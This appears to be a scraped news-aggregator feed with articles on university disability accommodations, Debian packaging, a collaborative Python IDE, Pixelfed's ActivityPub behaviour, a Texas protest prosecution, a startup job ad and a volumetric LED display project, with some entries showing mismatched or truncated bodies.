Simplification doesn't require tossing out digital rights. The EC should keep that in mind as it launches its reality check of core legislation such as the Digital Services Act and Digital Markets Act, where tidying up can too easily drift into verschlimmbessern, the kind of well-meant fix that ends up resembling the infamous ecce homo restoration.

Why Are 38 Percent of Stanford Students Saying They're Disabled?

Hacker News
reason.com
2025-12-04 18:04:07
Comments...
Original Article

The students at America's elite universities are supposed to be the smartest, most promising young people in the country. And yet, shocking percentages of them are claiming academic accommodations designed for students with learning disabilities.

In an article published this week in The Atlantic, education reporter Rose Horowitch lays out some shocking numbers. At Brown and Harvard, 20 percent of undergraduate students are disabled. At Amherst College, that's 34 percent. At Stanford University, it's a galling 38 percent. Most of these students are claiming mental health conditions and learning disabilities, like anxiety, depression, and ADHD.

Obviously, something is off here. The idea that some of the most elite, selective universities in America—schools that require 99th percentile SATs and sterling essays—would be educating large numbers of genuinely learning disabled students is clearly bogus. A student with real cognitive struggles is much more likely to end up in community college, or not in higher education at all, right?

The professors Horowitch interviewed largely back up this theory. "You hear 'students with disabilities' and it's not kids in wheelchairs," one professor told Horowitch. "It's just not. It's rich kids getting extra time on tests." Talented students get to college, start struggling, and run for a diagnosis to avoid bad grades. Ironically, the very schools that cognitively challenged students are most likely to attend—community colleges—have far lower rates of disabled students, with only three to four percent of such students getting accommodations.

To be fair, some of the students receiving these accommodations do need them. But the current language of the Americans with Disabilities Act (ADA) allows students to get expansive accommodations with little more than a doctor's note.

While some students are no doubt seeking these accommodations as semi-conscious cheaters, I think most genuinely identify with the mental health condition they're using to get extra time on tests. Over the past few years, there's been a rising push to see mental health and neurodevelopmental conditions as not just a medical fact, but an identity marker. Will Lindstrom, the director of the Regents' Center for Learning Disorders at the University of Georgia, told Horowitch that he sees a growing number of students with this perspective. "It's almost like it's part of their identity," Lindstrom told her. "By the time we see them, they're convinced they have a neurodevelopmental disorder."

What's driving this trend? Well, the way conditions like ADHD, autism, and anxiety get talked about online—the place where most young people first learn about these conditions—is probably a contributing factor. Online creators tend to paint a very broad picture of the conditions they describe. A quick scroll of TikTok reveals creators labeling everything from always wearing headphones, to being bad at managing your time, to doodling in class as a sign that someone may have a diagnosable condition. According to these videos, who isn't disabled?

The result is a deeply distorted view of "normal." If ever struggling to focus or experiencing boredom is a sign you have ADHD, the implication is that a "normal," nondisabled person has essentially no problems. A "neurotypical" person, the thinking goes, can churn out a 15-page paper with no hint of procrastination, maintain perfect focus during a boring lecture, and never experience social anxiety or awkwardness. This view is buttressed by the current way many of these conditions are diagnosed. As Horowitch points out, when the latest edition of the DSM, the manual psychiatrists use to diagnose patients, was released in 2013, it significantly lowered the bar for an ADHD diagnosis. When the definition of these conditions is set so liberally, it's easy to imagine a highly intelligent Stanford student becoming convinced that any sign of academic struggle proves they're learning disabled, and any problems making friends are a sign they have autism.

Risk-aversion, too, seems like a compelling factor driving bright students to claim learning disabilities. Our nation's most promising students are also its least assured. So afraid of failure—of bad grades, of a poorly-received essay—they take any sign of struggle as a diagnosable condition. A few decades ago, a student who entered college and found the material harder to master and their time less easily managed than in high school would have been seen as relatively normal. Now, every time she picks up her phone, a barrage of influencers is clamoring to tell her this is a sign she has ADHD. Discomfort and difficulty are no longer perceived as typical parts of growing up.

In this context, it's easy to read the rise of academic accommodations among the nation's most intelligent students as yet another manifestation of the risk-aversion endemic in the striving children of the upper middle class. For most of the elite-college students who receive them, academic accommodations are a protection against failure and self-doubt. Unnecessary accommodations are a two-front form of cheating—they give you an unjust leg-up on your fellow students, but they also allow you to cheat yourself out of genuine intellectual growth. If you mask learning deficiencies with extra time on tests, soothe social anxiety by forgoing presentations, and neglect time management skills with deadline extensions, you might forge a path to better grades. But you'll also find yourself less capable of tackling the challenges of adult life.

Colin Watson: Free software activity in November 2025

PlanetDebian
www.chiark.greenend.org.uk
2025-12-04 17:55:59
My Debian contributions this month were all sponsored by Freexian. I had a bit less time than usual, because Freexian collaborators gathered in Marseille this month for our yearly sprint, doing some planning for next year. You can also support my work directly via Liberapay or GitHub Sponsors. Open...
Original Article

My Debian contributions this month were all sponsored by Freexian. I had a bit less time than usual, because Freexian collaborators gathered in Marseille this month for our yearly sprint, doing some planning for next year.

You can also support my work directly via Liberapay or GitHub Sponsors .

OpenSSH

I began preparing for the second stage of the GSS-API key exchange package split (some details have changed since that message). It seems that we’ll need to wait until Ubuntu 26.04 LTS has been released, but that’s close enough that it’s worth making sure we’re ready. This month I just did some packaging cleanups that would otherwise have been annoying to copy, such as removing support for direct upgrades from pre-bookworm. I’m considering some other package rearrangements to make the split easier to manage, but haven’t made any decisions here yet.

This also led me to start on a long-overdue bug triage pass, mainly consisting of applying usertags to lots of our open bugs to sort them by which program they apply to, and also closing a few that have been fixed, since some bugs will eventually need to be reassigned to GSS-API packages and it would be helpful to make them easier to find. At the time of writing, about 30% of the bug list remains to be categorized this way.

Python packaging

I upgraded these packages to new upstream versions:

I packaged django-pgtransaction and backported it to trixie, since we plan to use it in Debusine; and I adopted python-certifi for the Python team.

I fixed or helped to fix several other build/test failures:

I fixed a couple of other bugs:

Other bits and pieces

Code reviews


PyTogether: Collaborative lightweight real-time Python IDE for teachers/learners

Hacker News
github.com
2025-12-04 17:43:07
Comments...
Original Article

PyTogether
Google docs for Python. A fully browser-based collaborative Python IDE with real-time editing, chat, and visualization.

pytogether.org

( https://pytogether.org/ )

Features

  • Real-time Collaboration - Edit Python code together instantly using Y.js.
  • Secure Authentication - Log in manually or with Google OAuth.
  • Groups & Projects - Organize your work into teams and projects.
  • Live Drawings - Draw directly on the IDE to assist with note-taking or teaching.
  • Live Cursors/Selections - Google docs-like live selections for smoother collaboration.
  • Live Chat and Voice Calls - Real-time messaging, and Discord-like voice chats for each project.
  • Code Linting - Integrated CodeMirror linting for cleaner, error-free code.
  • Smart Autosave - Code is automatically saved every minute and on exit.

Demo

Drawing Demo


About

When starting out in programming, many beginners find traditional IDEs overwhelming: full of plugins, extensions, configuration steps, paywalls, and complex UIs. PyTogether removes these barriers by offering a lightweight, distraction-free environment where you can focus on writing Python code right away.

The platform is designed for learning, teaching, and pair programming , making it ideal for classrooms, coding clubs, or quick collaborations.

Note: PyTogether is intended for educational purposes and beginner use. It is not optimized for large-scale production development.

Why PyTogether?

While there are many online IDEs (Replit, Jupyter, Google Colab, etc.), PyTogether is built with a different goal: simplicity first .

  • Instant Setup ⚡- No downloads, no pip installs, no hidden complexity. Just create a group, create a project, and bam!
  • Beginner Focused - No confusing menus, terminals, or configuration. Just code and run.
  • Real-Time Collaboration - Work together with classmates, friends, or mentors in the same editor.
  • Safe Learning Space - Limited features by design to reduce distractions and keep beginners focused.

Unlike production-grade IDEs, PyTogether prioritizes ease of use and collaboration for learners rather than advanced features.

Technologies

  • Backend : Django, Django REST Framework (DRF)
  • Real-Time : Y.js, WebSockets (Django Channels)
  • Async Processing : Celery
  • Data Store : PostgreSQL (via Supabase)
  • Caching, Broker, & Channel layers : Redis
  • Frontend : React, Tailwind CSS, CodeMirror (code linting)
  • Python Execution : Pyodide (via Web Worker)
  • Deployment : Vercel (Frontend), Docker on VPS (Backend), Nginx (reverse proxy)
  • CI/CD : GitHub Actions (deploy backend to VPS on push to main)

Contributing & Local Setup

  • Requirements: Docker, Node

Running PyTogether locally is a simple two-step process. Run the following commands from the project root:

# 1. Install all dependencies (automatically does it for root and frontend)
npm install

# 2. Start the servers
npm run dev

This will install all required packages, run the backend container, and start the frontend. It should take around 2-5 minutes on initial launch. The frontend will be live on http://localhost:5173. You can press CTRL+C to stop the program/containers.

Note Two superusers are created automatically:

  • Email: test1@gmail.com
  • Email: test2@gmail.com

Both have the password testtest . You can log in with them on the frontend.

You may also adjust the settings in backend/backend/settings/dev.py

Author

Jawad Rizvi

Applied Mathematics & Computer Engineering student at Queen's University.

Is Pixelfed sawing off the branch that the Fediverse is sitting on?

Lobsters
ploum.net
2025-12-04 17:30:01
Comments...
Original Article

by Ploum on 2025-12-04

In January 2025, I became aware that there was a real problem with Pixelfed, the "Instagram inspired Fediverse client". The problem is threatening the whole Fediverse. As Pixelfed received a lot of media attention, I chose to wait. In March 2025, I decided that the situation was quieter and wrote an email to Dansup, Pixelfed’s maintainer, with an early draft of this post. Dan replied promptly, in a friendly tone, but didn’t want to acknowledge the problem, which I’ve confirmed many times with Pixelfed users. I want to bring the debate into the public square. If I’m wrong, I will at least understand why. If Dan is wrong on this very specific issue, we will at least open the debate.

This post will be shared to my Fediverse audience through my @ploum@mamot.fr Mastodon account. But Pixelfed users will not see it. Even if they follow me, even if many people they follow boost it. Instead, they will see a picture of my broken keyboard that I posted a week ago.

The latest post of Ploum according to Pixelfed.

That’s because, despite its name, Pixelfed is NOT a true Fediverse application. It does NOT respect the ActivityPub protocol. Any Pixelfed user following my @ploum@mamot.fr account will only see a very small fraction of what I post. They may not see anything from me for months.

But why? Simple! The Pixelfed app has unilaterally decided not to display most Fediverse posts for the arbitrary reason that they do not contain a picture.

This is done on purpose and by design. Pixelfed is designed to mimic Instagram. Displaying text without pictures was deliberately removed from the code (it was possible in previous versions) in order to make the interface prettier.

This is unlike a previous problem where Pixelfed would allow unauthorised users to read private posts from unknowing fediverse users, which was promptly fixed.

In this case, we are dealing with a conscious design decision by the developers. Being pretty is more important than transmitting messages.

Technically, this means that a Pixelfed user P will think that he follows someone but will miss most of the content. Conversely, the sender, for example a Mastodon user M, will believe that P has received his message because P follows him.

This is a grave abuse of the protocol: messages are silently dropped. It stands against everything the Fediverse is trying to do: allow users to communicate. My experience with open protocols allows me to say that this is a critical problem and that it cannot be tolerated. Would you settle for a mail provider which silently dropped every email you receive that contains the letter "P"?

The principle behind a communication protocol is to create trust that messages are transmitted. Those messages could, of course, be filtered by the users but those filters should be manually triggered and always removable. If a message is not delivered, the sender should be notified.

In 2025, I’ve read several articles about people trying the Fediverse but leaving it because "there’s not enough content despite following lots of people". Due to the Pixelfed buzz in January, I’m now wondering: "how many of those people were using Pixelfed and effectively missing most of the Fediverse content?"

The importance of respecting the protocol

I cannot stress enough how important that problem is.

If Pixelfed becomes a significant actor, its position will gravely undermine the ActivityPub protocol to the point of making it meaningless.

Imagine a new client, TextFed, that will never display posts with pictures. That makes as much sense as the opposite. Lots of people, like me, find pictures disturbing, and some people cannot see pictures at all. So TextFed makes as much sense as Pixelfed. Once you have TextFed, you realise that TextFed and Pixelfed users can follow each other, they can comment on posts from Mastodon users, they can exchange private messages, but they will never be able to see posts from each other.

For any normal user, there’s no real way to understand that they miss some messages. And even if you do, it is very hard to discover that the cause is that the absence of pictures makes those messages "not pretty enough" for the Pixelfed developers. Worst of all: some Mastodon posts do contain a picture but are still not displayed in Pixelfed, because the picture comes from a link preview and was not manually uploaded. Try to explain that to friends who reluctantly followed you on the Fediverse. Have a look at any Mastodon account and try to guess which posts will be shown to its Pixelfed followers!

That’s not something any normal human is supposed to understand. For Pixelfed users, there’s no way to see that they are missing some content. For Mastodon users, there’s no way to see that some of their audience is missing some content.

With trust in the protocol broken, people will revert to creating Mastodon accounts to follow Mastodon, Pixelfed accounts to follow Pixelfed, and TextFed accounts to follow TextFed. Even if it is not 100% needed, that’s the first intuition. It’s already happening around me: I’ve witnessed multiple people with a Mastodon account creating a Pixelfed account to follow Pixelfed users. They do this naturally because they were used to doing that with Twitter and Instagram.

Congratulations, you have successfully broken ActivityPub and, as a result, the whole Fediverse. What Meta was not able to do with Threads, the Fediverse did to itself. Because it was prettier.

Pixelfed will be forced to comply anyway

Now, imagine for a moment that Pixelfed takes off (which is something I wish for and would be healthy for the Fediverse) and that interactions are strong between Mastodon users and Pixelfed users (also something I wish for). I let you imagine how many bug reports developers will receive about "some posts are not appearing in my followers timeline" or "not appearing in my timeline".

This will result in a heavy pressure for Pixelfed devs to implement text-only messages. They will, at some point, be forced to comply, having eroded trust in the Fediverse for nothing.

Once a major actor in a decentralised network starts to mess with the protocol, there are only two possible outcomes: either that actor loses steam, or it becomes dominant enough to impose its own vision of the protocol. In fact, there’s a third option: the whole protocol becomes irrelevant because nobody trusts it anymore.

What if Pixelfed becomes dominant?

But imagine that Pixelfed is now so important that they can stick to their guns and refuse to display text messages.

Well, there’s a simple answer: every other fediverse software will now add an image with every post. Mastodon will probably gain a configurable "default picture to attach to every post so your posts are displayed in Pixelfed".

And now, without anyone ever having formally specified it, the ActivityPub protocol requires every message to have a picture.

That’s how protocols work. It already happened: that’s how all mail clients ended up implementing workarounds for the winmail.dat bug.

Sysadmins handling storage and bandwidth for the Fediverse thank you in advance.

We are not there yet

Fortunately, we are not there yet. Pixelfed is still brand new. It can still go back to displaying every message an end user expects to see when following another Fediverse user.

I stress that this should be the default, not a hidden setting. Nearly all Pixelfed users I’ve asked were unaware of the problem. They thought that if they follow someone on the Fediverse, they should, by default, see all their public posts.

There’s no negotiation. No warning on the Pixelfed website will be enough. In a federated communication system, filters should be opt-in. In fact, that’s what older versions of Pixelfed were doing.

But, while text messages MUST be displayed by default (MUST as in RFC), they can still be displayed as less important. For example, one could imagine having them smaller or whatever you find pretty, as long as it is clear that the message is there. I trust Pixelfed devs to be creative here.

The Fediverse is growing. The Fediverse is working well. The Fediverse is a tool that we urgently need in those trying times. Let’s not saw off the branch on which we stand when we need it the most.

UPDATE: Dansup, Pixelfed Creator, replied the following on Mastodon:

We are working on several major updates, and while I believe that Pixelfed should only show photo posts, that decision should be up to each user, which we are working to support.

I’m Ploum, a writer and an engineer. I like to explore how technology impacts society. You can subscribe by email or by rss. I value privacy and never share your address.

I write science-fiction novels in French. For Bikepunk, my new post-apocalyptic-cyclist book, my publisher is looking for contacts in other countries to distribute it in languages other than French. If you can help, contact me!

Alleged Antifa Cell Member Says He Was Accidentally Released, Turns Himself In: “I’m Not Hiding. Because I’m Innocent.”

Intercept
theintercept.com
2025-12-04 17:26:10
In an exclusive interview, Daniel Sanchez Estrada speaks about being arrested for transporting anarchist zines after a protest against ICE in Texas. The post Alleged Antifa Cell Member Says He Was Accidentally Released, Turns Himself In: “I’m Not Hiding. Because I’m Innocent.” appeared first on The ...
Original Article

For five months, Daniel Sanchez Estrada was the prisoner of a government that has branded him an “Antifa Cell operative.” He was accused of moving a box of anarchist zines from one suburb of Dallas to another after a protest against U.S. Immigration and Customs Enforcement.

On the day before Thanksgiving, he was released without warning or explanation. He walked out to a jail parking lot relishing the fresh air — and watching over his shoulder.

During the week that followed, Sanchez Estrada savored his time with family members and worried that his release might have been an accident. Apparently, he was right.


On Thursday, Sanchez Estrada turned himself in to await a trial that could be months away.

It was another swerve in the case of a man who has been demonized by the federal government for actions he took after a protest against Donald Trump’s immigration crackdown. Civil liberties advocates have decried the case against him as “guilt by literature.” (The U.S. Attorney’s Office for the Northern District of Texas declined to comment and the Federal Bureau of Prisons did not immediately respond to a request.)

In a Wednesday night interview during his final hours of freedom, Sanchez Estrada said the decision to voluntarily surrender himself was gut-wrenching.

“As scary as it is, I’m innocent,” he said. “I just have to go through this process. It’s necessary to show that I’m not the person they say I am. I’m not fleeing. I’m not hiding. Because I’m innocent. I haven’t done anything.”

Sanchez Estrada spoke to The Intercept outside an ice cream shop in an upscale shopping mall in Fort Worth, Texas. He was set to turn himself back in to jail 16 hours after the interview — but before that, he was treating his 12-year-old stepdaughter to sweets during his first meeting with her as a free man since his arrest in July.

Prairieland Protest

Prosecutors allege that Sanchez Estrada’s wife, Maricela Rueda, attended a chaotic protest outside ICE’s Prairieland Detention Center on July 4 that ended with a police officer wounded by gunfire. A separate defendant is the sole person accused of firing a gun at the officer.

The gathering outside the Alvarado, Texas, detention center happened in the context of a huge rise in the number of immigrants detained under Trump, from 39,000 in January to 65,000 in November, which has been accompanied by reports of dire conditions inside.

Supporters of the Prairieland defendants say the protesters hoped to cause a ruckus with fireworks in a show of solidarity. The government has accused members of what it dubs the “North Texas antifa cell” of rioting and attempted murder.

No one claims that Sanchez Estrada was present at the protest. Instead, he is accused of moving anarchist zines from his parents’ house to another residence near Dallas on July 6 after Rueda called him from jail. Sanchez Estrada was arrested when the move was spotted by an FBI surveillance team, according to the government.


Prosecutors said the zines contained “anti-law enforcement, anti-government and anti-Trump sentiments.” In a statement made outside of his interview, Sanchez Estrada said that possession of such items is clearly protected by the First Amendment.

“My charge is allegedly having a box containing magazine ‘zines,’ books, and artwork,” Sanchez Estrada said. “Items that should be protected under the First Amendment ‘freedom of speech.’ If this is happening to me now, it’s only a matter of time before it happens to you.”

Civil liberties groups such as the Freedom of the Press Foundation have denounced his case as “guilt by literature.” They warn that his case could be the first of many such prosecutions in the wake of a presidential memo from Trump targeting “antifa” and other forms of “anti-Americanism.”

The purported “North Texas antifa cell” has been cited by FBI Director Kash Patel and others as a prime example of a supposed surge in the number of attacks on ICE officers — although a recent Los Angeles Times analysis found that unlike the incident in Texas, most of those alleged attacks resulted in no injury.

Sanchez Estrada faces up to 20 years on counts of corruptly concealing a document or record and conspiracy to conceal documents. The stakes are higher for him than other defendants because he is a green card holder, which ICE spotlighted in a social media post that included his picture and immigration history.

“I Did Not Participate”

Sanchez Estrada also worries about the fate of his wife, who faces life imprisonment if convicted. She pleaded not guilty in an arraignment Wednesday. The case is currently set for trial on January 20.

“I want to be very clear. I did not participate. I was not aware nor did I have any knowledge about the events that transpired on July 4 outside the Prairieland Detention Center,” Sanchez Estrada said in his statement. “My feeling is that I was only arrested because I’m married to Mari Rueda, who is being accused of being at the noise demo showing support to migrants who are facing deportation under deplorable conditions.”

Sanchez Estrada said that he spent his months in jail anguishing over how his stepdaughter would be affected and how his parents, for whom he is the primary supporter, would make ends meet.

A nature lover who peppers his speech with references to “the creator,” Sanchez Estrada said one of the toughest things about being in jail was not being able to breathe fresh air or watch the sun set.

He said he was immediately suspicious when jail officers told him that he was being released.


“You normally would assume the worst when you’re in there. I just did not believe them. I thought they would be waiting in the parking lot to arrest me,” he said.

Soon, however, Sanchez Estrada was eating vegan tacos and spending time with friends and family.

“It is something just beautiful to see — everyone rooting for you,” he said.

He fears what could happen when he returns to custody. Still, he will have a reminder of his brief return to life on the outside: freshly inked tattoos of a raccoon and an opossum.

“They’ve been here even before people,” he said. “They’re wild animals, and they’re beautiful.”

Update: December 4, 2025, 12:58 p.m. ET
This story has been updated to reflect that, after publication, the U.S. Attorney’s Office for the Northern District of Texas declined to comment.

Functional Quadtrees

Lobsters
www.lindelystables.dk
2025-12-04 17:07:08
Comments...
Original Article

Sandra L. Hansen

Sandra founded Lindely Stables in 2019, but her riding career began in earnest in 2002, when she was accepted onto the Danish Pony National Team and helped win gold at the Nordic Championships. In 2005 she represented Denmark at the European Championships in show jumping on horses.

She has competed in many national shows, as well as international shows in classes up to 145cm.

In addition to being a skilled show jumper who often competes herself, she has specialised in breaking in young horses, training, breeding & nutrition, all on the horse's terms and at the horse's pace.

In 2024 her home-bred Baldur developed serious problems with nervousness, especially around shows. Every product, training method, treatment, and piece of advice from the vet was tried without effect. It was only when she stumbled upon the Dutch Librium that the code was cracked.

Librium turned out to be liquid peace of mind for Baldur, who quickly regained his great joy in riding and competing!

As a result, Sandra began a collaboration with Lau Bjørn Jensen, and together they became importers of Prenimal's entire Prequine series of supplements for horses of the highest quality. Every supplement contributes either to the horse's health or quality of life, and the mission is clear:

All horses should have the chance to live their best horse life.

Converge (YC S23) is hiring a martech expert in NYC

Hacker News
www.runconverge.com
2025-12-04 17:00:37
Comments...
Original Article

Converge is building the definitive Growth OS : We help DTC Growth teams understand which marketing efforts drive profitable growth . We are the only platform combining best-in-class tracking with blended reporting and multi-touch attribution.

Our unique positioning has led to rapid growth in both number and size of customers. One of the secrets of our growth is that we invest heavily in customer success. Whereas our competitors see success as a cost center, we take pride in delivering expert martech and marketing reporting support throughout the entire customer lifecycle and we compensate accordingly.

Our strategy is paying off, with 200+ paying customers (including some of the most famous DTC brands) and strong investor backing. We are now looking for a senior Technical Customer Success Manager to help us scale to $10M+ ARR .

Responsibilities

Be a marketing measurement expert : Advise customers on attribution, conversion tracking, and reporting strategies, positioning yourself as a trusted technical partner.

Technical support : Investigate and resolve conversion tracking and attribution issues reported through all channels, including email, Slack and in-app.

Onboard new customers : Own the customer onboarding end-to-end, driving them from initial implementation to real and lasting success.

Drive renewals : Take full ownership of renewal conversations, mitigating churn risk and implementing proactive retention strategies.

Champion customer needs : Surface trends and insights from collected customer feedback to the team at large to inform product roadmap.

Activate: Maximize the adoption of our product features and provide proactive, regular recommendations to get more out of the platform.

Expand customer contracts : Identify and execute expansion opportunities to increase account value.

Lead strategic projects : Improve the support experience and feature adoption.

You will thrive in this role if you

Have strong martech experience : Google Tag Manager, Meta Events Manager, Google Consent Mode and other pieces of the martech stack have no secrets for you.

Are curious and technical : You love understanding complex products deeply. Bonus points if you already love JS debugging, sifting through network requests or reasoning over attribution logic.

Thrive in ambiguity : You enjoy building processes from scratch and figuring things out without a playbook.

Are commercially minded : You know how to uncover customer needs and tie solutions to real business value.

Have advertising experience: You speak the language of a growth team, and have experience with Ads Managers, attribution and creative strategy.

This role is not for you if you

Do not want to become an expert : Our customers choose us because we deeply understand their technical challenges.

Prefer certainty over upside : There are no rigid and limited responsibilities here - we grant a lot of agency and expect a lot of accountability.

Don't like working hard : This role demands more commitment and agency than a typical success role.

Prefer remote over in-person : We believe being in-person helps us move faster.

What we offer

Compensation: $155k - $217k + equity: 0.1% - 0.25%.

Career-defining opportunity to build the U.S. success function and work with the world's best DTC growth teams.

Private health, dental, and vision insurance.

Pension & 401k contributions.

Opportunity to work on a complex product that customers love - 35% of our users use us daily (!)

Interview process*

Application : We're looking to see how your skills and experience align with our needs.

Intro interview (30-min): Our goal is to learn more about what you are looking for in your next role, explore your motivations to join our team, why you would be a great fit, and answer questions about us.

Culture interview (45-min): We will walk through your experience and background in detail.

Case interview (1 hour): We will simulate a real customer situation.

Offer If everyone’s aligned, we’ll move quickly to make you an offer.

(*) can be done in 2 days, just flag to us that you want to do it fast.

We raised $5.7M from some of the best investors

James Hawkins

Nicolas Dessaigne

What makes Converge unique

Ridiculously lean

We operate a >$1M ARR business with >200 customers with a team of just 9 people.

Why you should care:

You will not find a startup with this level of product-market-fit where you can join as employee #10.

Huge product surface

We compete with Segment, Fivetran, Google Tag Manager, Rockerbox, Looker, just to name a few.

Why you should care:

Other startups give you ownership of a feature. At Converge, you get ownership over an entire product .

Customers rely on us

Converge sees 35% of its users daily , while this is only 13% for the average SaaS company.

Why you should care:

Our customers will be excited by every feature you ship, and your impact will be felt immediately .

Real scale

We collect around 20M customer interactions per day and process ~$3B in GMV annually .

Why you should care:

Even though you join early, this job comes with real engineering challenges .

How we started

Did you know…

All co-founders have written code that has run in production as part of Converge.

We closed our first publicly traded company during our YC batch from our living room in San Francisco.

Thomas and Tiago (Founding Engineer) worked together when Thomas was just an intern.

Michel (Customer Success) was responsible for most of the incoming Converge Support tickets in his previous job as a freelance tracking consultant.

Thomas and Jan were best friends in high school, and Jan and Jerome met in their first year of college.

Founding team

Multivox: Volumetric Display

Hacker News
github.com
2025-12-04 16:58:35
Comments...
Original Article

Multivox

This is the code I currently use to drive my volumetric displays .

It supports two closely related devices which are configured in the src/driver/gadgets directory:

  • Rotovox is a 400mm Orb featuring two 128x64 panels arranged vertically side by side.
  • Vortex is a 300mm Orb featuring two 128x64 panels arranged horizontally, back to back.

Rotovox has a higher vertical resolution and better horizontal density; Vortex is brighter and has a higher refresh rate.

The 3D printable parts for Vortex are available here .

A photograph of two orbs, one running Doom, the other GTA

Hardware

This code was originally written for a single display, and the device specific code was later somewhat abstracted out to support a second similar gadget. There are assumptions about the hardware that are pretty well baked in:

  • It consists of two HUB75 LED panels spinning around a vertical axis.
  • The panels use either ABCDE addressing or ABC shift register addressing.
  • It uses a single GPIO (a photodiode or similar) to sync to rotation - high for 180°, low for 180°.
  • It's running on a Raspberry Pi 4.

The GPIO mappings and panel layout are defined in src/driver/gadgets/gadget_<name>.h . GPIO is via memory mapped access - if you're using a different model of Pi you'll need to change BCM_BASE in the GPIO code. I haven't tested this, and you should probably assume it doesn't work.

Input is via a bluetooth gamepad - I've been using an Xbox controller, and the input system is based on the default mapping for that.

Audio out is also via bluetooth. I haven't had success with the higher quality codecs, but the headset protocol works.

Layout

There are two parts to this code - the driver, which creates a voxel buffer in shared memory and scans its contents out in sync with rotation, and the client code which generates content and writes it into the voxel buffer. Both driver and client code are designed to run on the same device, a Raspberry Pi embedded in the hardware and spinning at several hundred RPM. There is a demo included in the Python directory which streams point clouds from a PC over wifi to the device, but fundamentally it's designed as a self contained gadget, like an alternate timeline Vectrex. A bluetooth gamepad is used to control the demos.
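As a rough, illustrative sketch of the scan-out idea (the real driver is C with memory-mapped GPIO; the slice count and helper below are assumptions for illustration, not the project's API), the mapping from rotation phase to the slice being displayed could look like this:

# Toy sketch only: estimate which angular slice to scan out, given the
# timestamp of the last rotation-sync edge (the photodiode is high for
# 180 degrees and low for 180) and the measured revolution period.

SLICES_PER_REV = 128   # angular slices per revolution; configurable per gadget

def current_slice(last_sync: float, rev_period: float, now: float) -> int:
    phase = ((now - last_sync) % rev_period) / rev_period   # 0.0 .. 1.0
    return int(phase * SLICES_PER_REV)

# e.g. at 300 RPM (0.2 s per revolution), a quarter turn after sync:
print(current_slice(last_sync=0.0, rev_period=0.2, now=0.05))   # -> 32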

├── src
│   ├── driver
│   │   ├── gadgets         -- the different volumetric display configurations
│   │   │   └──             
│   │   └── vortex.c        -- driver code - creates a voxel buffer in shared memory,
│   │                          and handles scanning it out to the led panels in sync with
│   │                          the rotation
│   ├── simulator
│   │   └── virtex.c        -- software simulator - presents the same voxel buffer as
│   │                          the driver would, but renders the contents into an X11 window
│   │
│   ├── multivox            -- front end / launcher for the various volumetric toys
│   │   └──
│   ├── platform            -- common client code
│   │   └──
│   └── toys                -- a collection of volumetric demos using the shared voxel buffer
│       ├── eighty          -- multiplayer light cycles
│       ├── fireworks.c     -- cheesy first demo
│       ├── flight.c        -- some kind of 70s scifi thing
│       ├── tesseract.c     -- a 4D cubube
│       ├── viewer.c        -- viewer for .obj and .png files
│       └── zander          -- lander/zarch/virus-esque
├── python  
│   ├── calibration.py      -
│   ├── grid.py             -- some pattern generators, useful when calibrating the device
│   ├── colourwheel.py      -
│   ├── obj2c.py            -- tool for embedding .obj models in a header file
│   ├── pointvision.py      -- receive point clouds streamed from vortexstream.py
│   └── vortexstream.py     -- stream point clouds to pointvision.py
└── README.md               -- you are here

Building

On the Raspberry Pi, clone the repository:

git clone https://github.com/AncientJames/multivox.git

Configure the project for your hardware:

cd multivox
mkdir build
cd build
cmake -DMULTIVOX_GADGET=vortex ..
cmake --build .

Running

First, the driver has to be running; e.g. launch ./vortex from the build directory.

When invoked from the command line it periodically outputs profiling information (frame rate, rotation rate), and accepts keyboard input for various diagnostics:

Key Effect
esc Exit
b Bit depth - cycles through 1, 2 or 3 bits per channel. Higher bit depths result in lower refresh rates
u Uniformity - cycles through different strategies for trading off brightness against uniformity
t Trails - adjusts how far back to accumulate skipped voxels when the rotation rate is too high for the refresh rate
l Lock - whether to adjust the rotation sync to keep it facing one way
d Drift - rotisserie mode. Introduces some explicit drift to the rotation sync
p Panel - selectively disable the panels
xyz Axis - When the display isn't spinning, it shows an orthographic view. This lets you choose the axis

While that's running, try one of the toys:

The viewer takes a list of .obj and .png files as arguments. You can scale, rotate and so on using the gamepad, and it also accepts keyboard input when run remotely from the command line.

./viewer ~/Multivox/models/*.obj
Control Key Effect
esc Exit
LB/RB [ / ] Cycle through models
A Walkthrough / Orbit
X Zoom to fit
Y Toggle wireframe

Simulator

If you don't have a physical volumetric display, there's a simulator, virtex , which you can run in place of vortex . It exposes the same voxel buffer in shared memory, but renders the contents using OpenGL in an X11 window.

Screenshot of a tesseract rendered in Virtex

Run without command line arguments, it creates a display compatible with the currently configured gadget, but there are some options to let you experiment with different geometries:

Option Effect
-s X slice count - the number of vertical slices per revolution
-o X X offsets - distance the front and back screens are offset from the axis, as a fraction of screen radius
-b X bits per channel (1 - 3)
-w X Y panel resolution
-g X scan geometry - radial or linear. Linear looks better, but it's a lot harder to build.

An idealised device with linear scanning and 3 bits per channel can be invoked like this:

./virtex -g l -s 128 -w 1280 1280 -b 3

The simulator is fill rate intensive; if you're running it on a Raspberry Pi you'll probably want to reduce the slice count.

Installing

If you want it to start up automatically on boot, you can install vortex as a service, and set multivox to run on startup.

First install everything to its default location ~/Multivox :

make install

This will build the executable files and copy them into the destination directory, as well as creating .mct files in ~/Multivox/carts for the built in toys.

Create the driver service:

sudo nano /usr/lib/systemd/system/vortex.service

and fill in the following information:

[Unit]
Description=Vortex Display Driver
After=multi-user.target

[Service]
ExecStart=/home/pi/Multivox/bin/vortex

[Install]
WantedBy=multi-user.target

Then start it up:

sudo systemctl daemon-reload
sudo systemctl enable vortex.service

The driver assigns itself to core 3 - you can add isolcpus=3 to the end of /boot/cmdline.txt to ensure it's the only thing running on that core.

You'll also want the launcher to start up on boot; edit your crontab (crontab -e):

And add the line:

@reboot /home/pi/Multivox/bin/multivox

Multivox

If everything goes smoothly, when you turn on the device it will boot up into Multivox. This is a fantasy console which acts as a launcher for all the games and demos you run on the hardware. The bundled toys are automatically installed in the ~/Multivox/carts/ directory as .mct files, and external apps can be launched by adding a .mct file containing the app's command, path, and arguments.

Each .mct file appears as a cartridge in the Multivox front end. They should each have a label on the side; at the moment all you can do to distinguish between them is change their colour in the .mct .

When you exit an app back to the launcher, it saves a snapshot of the voxel volume, and this gives a preview of what you'll see when you launch a cart. This means there are two competing representations of the same information, and any future work on the front end will probably start with overhauling the entire approach.

Some basic UI for controls such as changing bit depth, rebooting and so on would also be a boon.

Control Effect
LB/RB Cycle through carts
A Launch cart
Exit / resume running cart
△ ▽ Change bit depth
☰ x5 Power off

The End of the Train-Test Split

Hacker News
folio.benguzovsky.com
2025-12-04 16:53:49
Comments...
Original Article

2015: Loosely based on a true story.

